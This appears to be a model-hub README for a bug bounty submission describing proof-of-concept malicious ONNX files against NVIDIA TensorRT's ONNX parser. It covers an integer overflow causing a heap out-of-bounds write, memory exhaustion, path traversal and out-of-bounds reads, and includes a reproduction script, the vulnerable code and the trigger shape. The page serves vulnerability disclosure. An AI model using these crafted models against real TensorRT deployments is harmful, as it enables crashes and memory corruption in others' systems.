TensorRT ONNX Parser - Security PoC Models
Bug bounty research submission to huntr.com targeting NVIDIA TensorRT ONNX parser.
Vulnerabilities
| File | Vulnerability | CWE | Severity |
|---|---|---|---|
eyelike_overflow.onnx |
Integer overflow -> heap OOB write in EyeLike op | CWE-190, CWE-122 | Critical |
eyelike_small_overflow.onnx |
Same bug, faster crash trigger | CWE-190, CWE-122 | Critical |
external_oom_length.onnx |
Uncapped length field -> OOM denial of service | CWE-770 | High |
external_abs_path.onnx |
Absolute path traversal bypass in external weights | CWE-22 | Medium |
external_neg_offset.onnx |
Negative seek offset in external weights | CWE-20 | Medium |
external_oob_offset.onnx |
Read past EOF - uninitialized buffer risk | CWE-125 | Medium |
Reproduce (Finding 1 - Heap OOB Write)
import tensorrt as trt
logger = trt.Logger(trt.Logger.VERBOSE)
builder = trt.Builder(logger)
network = builder.create_network(
1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
parser = trt.OnnxParser(network, logger)
with open("eyelike_overflow.onnx", "rb") as f:
parser.parse(f.read())
# Expected: SIGSEGV / heap-buffer-overflow
Root Cause (Finding 1)
// onnxOpImporters.cpp - EyeLike importer
int totalWeights = dims.d[0] * dims.d[1]; // int32 overflow! dims are int64_t
std::vector<int> values(totalWeights); // undersized allocation
for (int32_t r = 0; r < dims.d[0]; ++r)
for (int32_t c = 0; c < dims.d[1]; ++c)
values[r * dims.d[1] + c] = 0; // OOB WRITE
Trigger: input shape [65537, 65536]
- True product: 4,295,032,832 (overflows int32)
- int32 truncated: 65,536 (vector too small)
- First OOB write: r=1, c=0 -> index 65,536
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support